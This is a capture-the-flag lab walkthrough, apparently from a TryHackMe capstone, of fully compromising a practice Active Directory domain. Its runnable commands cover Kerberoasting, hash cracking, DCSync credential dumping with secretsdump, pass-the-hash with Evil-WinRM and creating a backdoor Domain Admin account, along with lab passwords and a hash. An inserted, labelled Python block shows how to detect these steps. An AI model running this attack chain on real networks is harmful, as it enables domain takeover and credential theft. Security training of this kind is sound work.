Full Compromise of CORP Domain

Used Tools

sshuttle

DNSChef

Bloodhound-python

neo4j

Bloodhound

impacket's GetUserSPNs.py

Hashcat

impacket's secretsdump

Evil-WinRM

Remmina

Summary

With the connection previously established through sshuttle it is possible to enumerate the domain with Bloodhound-python without dropping SharpHound on any internal machine. Due to DNS errors, a fake DNS server was set up with DNSChef. Next, we use neo4j with Bloodhound to analyze the Bloodhound-python results. The first thing that immediately catches the eye is that Administrators and Domain Admins have the capability to perform a DCSync attack, and that some Service Principals are Kerberoastable. With impacket's GetUserSPNs.py we obtain the Kerberos hashes of five Service Principals; one of them, the svcScanning account, was crackable with Hashcat. Running Bloodhound again with the more privileged user svcScanning, we find that svcBackups also has the ability to perform a DCSync attack. Hoping to obtain the credentials of svcBackups, whether in clear text or as a hash, we run impacket's secretsdump as svcScanning and retrieve the clear-text credentials of svcBackups. From there we run impacket's secretsdump again, this time as svcBackups, and obtain the hash of the local Administrator of the child domain controller corpdc. With this hash we perform a pass-the-hash attack via Evil-WinRM against the child domain controller. From there we create our own user 0xb0b, add it to the Domain Admins group, and are now able to fully compromise the CORP domain and RDP into the child domain controller with the newly created user.

Investigation

First, we try to enumerate the domain with Bloodhound-python but receive a DNS error. The same issue occurred when passing the connection through SSH dynamic port forwarding with ProxyChains; in that case --dns-tcp has to be used. To work around the problem, a fake DNS server was set up.

Using Bloodhound-python with ProxyChains and DNSChef

https://www.youtube.com/watch?v=4ydjpSSKQ8g

Run the following to establish the fake DNS server.

This time the bloodhound-python command looks a bit different: the nameserver is now our localhost, everything else remains the same, and we are able to enumerate the domain.

┌──(0xb0b㉿kali)-[~/Documents/tryhackme/capstone/bloodhound/laura.wood]
└─$ bloodhound-python -d corp.thereserve.loc -u laura.wood -p 'Password1@' -dc corpdc.corp.thereserve.loc -c all -ns 127.0.0.1

Let's start neo4j and run Bloodhound to find some interesting paths in the domain.

Just drop the files into Bloodhound.

The first thing that catches the eye is that we are able to find groups with the ability to perform DCSync attacks, which might be interesting for the full compromise of the parent domain. In a DCSync attack, credentials are harvested by impersonating a domain controller and asking another domain controller to replicate directory information. This can be accomplished remotely via impacket's secretsdump.py or locally by running mimikatz on a victim machine with lsadump::dcsync.

https://tryhackme.com/room/persistingad Persistence through Credentials

Administrators and Domain Admins are able to perform a DCSync attack.

Running GetUserSPNs.py to get information about the ServicePrincipalNames in the domain, in the hope of obtaining a more privileged user.

┌──(0xb0b㉿kali)-[~/Documents/tryhackme/capstone]
└─$ /usr/share/doc/python3-impacket/examples/GetUserSPNs.py corp.thereserve.loc/laura.wood:"Password1@" -dc-ip 10.200.103.102 -request

Here we have the hashes of svcBackups, svcEDR, svcMonitor, svcScanning and svcOctober.

Trying to crack the hashes with Hashcat gives us the credentials of svcScanning:Password1

We chose to use mode 13100 for cracking Kerberos 5, etype 23, TGS-REP hashes.

Next, we repeat the Bloodhound enumeration, this time as svcScanning.

┌──(0xb0b㉿kali)-[~/Documents/tryhackme/capstone/bloodhound/svcScanning]
└─$ bloodhound-python -d corp.thereserve.loc -u svcScanning -p 'Password1!' -dc corpdc.corp.thereserve.loc -c all -ns 127.0.0.1

After deleting the database and resetting the database stats, we drop in the results collected as svcScanning.

Checking the shortest paths to high value targets reveals that the user svcBackups also has the capability to perform a DCSync attack.

Running impacket-secretsdump as the user svcScanning in the hope of obtaining credentials of svcBackups or another high value target.

┌──(0xb0b㉿kali)-[~/Documents/tryhackme/capstone]
└─$ impacket-secretsdump corp.thereserve.loc/svcScanning:'Password1!'@10.200.103.31

svcBackups@corp.thereserve.loc:q9nzssaFtGHdqUV3Qv6G

This gives us the credentials of svcBackups, which has DCSync capabilities.

With this user we run impacket-secretsdump again, this time against the domain controller, and are able to retrieve the local Administrator hash.

┌──(0xb0b㉿kali)-[~/Documents/tryhackme/capstone]
└─$ impacket-secretsdump corp.thereserve.loc/svcBackups:q9nzssaFtGHdqUV3Qv6G@10.200.103.102

Using Evil-WinRM and a pass-the-hash attack we are able to connect directly to the child domain controller corpdc.

┌──(0xb0b㉿kali)-[~/Documents/tryhackme/capstone]
└─$ evil-winrm -u Administrator -H d3d4edcc015856e386074795aea86b3e -i 10.200.103.102

Running the following commands to add our own user and add it to the Domain Admins group.

New-ADUser 0xb0b

Add-ADGroupMember -Identity 'Domain Admins' -Members 0xb0b

Set-ADAccountPassword -Identity 0xb0b -NewPassword (ConvertTo-SecureString -AsPlainText "WhoKnows1337Me?" -Force)

Enable-ADAccount -Identity '0xb0b'
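From the defender's side, the three steps above (Kerberoasting of the service accounts, the DCSync performed by secretsdump, and the new account added to Domain Admins) each leave a distinct trace in the Windows Security log. The following is an added example that is not part of the original write-up: simplified detection logic run over constructed event records (plain dicts, not a real EVTX export); the DC account allow-list CORPDC$ and all timestamps are assumptions.

```python
# Added example, not from the write-up: detection logic over constructed events.
from datetime import datetime, timedelta

# Extended-right GUIDs granting directory replication; a 4662 carrying one
# from a non-DC principal is the DCSync signature.
DCSYNC_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
DC_ACCOUNTS = {"CORPDC$"}  # assumed allow-list of DC machine accounts

def kerberoast_alerts(events):
    """4769 TGS requests with RC4 (etype 0x17) for user service accounts are
    what GetUserSPNs -request produces; machine and krbtgt tickets are skipped."""
    return sorted({e["service"] for e in events
                   if e["id"] == 4769 and e["etype"] == "0x17"
                   and not e["service"].endswith("$")
                   and e["service"].lower() != "krbtgt"})

def dcsync_alerts(events):
    """Subjects that exercised replication rights without being a DC."""
    return [e["subject"] for e in events
            if e["id"] == 4662 and e["subject"] not in DC_ACCOUNTS
            and DCSYNC_GUIDS & set(e.get("props", []))]

def new_domain_admin_alerts(events, window=timedelta(minutes=10)):
    """Account created (4720) and added to Domain Admins (4728) within
    `window`: the persistence step performed with New-ADUser above."""
    created = {e["target"]: e["time"] for e in events if e["id"] == 4720}
    return [e["target"] for e in events
            if e["id"] == 4728 and e["group"] == "Domain Admins"
            and e["target"] in created
            and timedelta(0) <= e["time"] - created[e["target"]] <= window]

# Constructed sample events mirroring the write-up (timestamps are invented)
T0 = datetime(2023, 5, 1, 10, 0)
SAMPLE = [
    {"id": 4769, "service": "svcScanning", "etype": "0x17", "time": T0},
    {"id": 4769, "service": "svcBackups", "etype": "0x17", "time": T0},
    {"id": 4769, "service": "CORPDC$", "etype": "0x12", "time": T0},  # AES, benign
    {"id": 4662, "subject": "CORPDC$", "time": T0,
     "props": ["1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},  # normal DC replication
    {"id": 4662, "subject": "svcBackups", "time": T0 + timedelta(minutes=20),
     "props": ["1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},  # secretsdump as svcBackups
    {"id": 4720, "target": "0xb0b", "time": T0 + timedelta(minutes=30)},
    {"id": 4728, "target": "0xb0b", "group": "Domain Admins",
     "time": T0 + timedelta(minutes=31)},
]
```

Real events carry these fields as ServiceName/TicketEncryptionType (4769), SubjectUserName/Properties (4662) and MemberName/TargetUserName (4720/4728); map them onto the dict keys above when feeding exported logs.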

Next, we use Remmina to connect to the domain controller as 0xb0b.

Connected to the domain controller as our user, we can start a command prompt as administrator. From there we can reach every machine in the CORP domain and place our proof of compromise in the given locations to retrieve the flags.

Flag-4: Administrative access to Corporate Division Tier 2 Infrastructure

echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > \\wrk1.corp.thereserve.loc\c$\Users\Administrator\0xb0b.txt

Flag-5: Foothold on Corporate Division Tier 1 Infrastructure

echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > \\server1.corp.thereserve.loc\c$\Windows\Temp\0xb0b.txt

Flag-6: Administrative access to Corporate Division Tier 1 Infrastructure

echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > \\server1.corp.thereserve.loc\c$\Users\Administrator\0xb0b.txt

Flag-7: Foothold on Corporate Division Tier 0 Infrastructure

echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > \\cropdc.corp.thereserve.loc\c$\Windows\Temp\0xb0b.txt

Flag-8: Administrative access to Corporate Division Tier 0 Infrastructure

echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > \\cropdc.corp.thereserve.loc\c$\Users\Administrator\0xb0b.txt
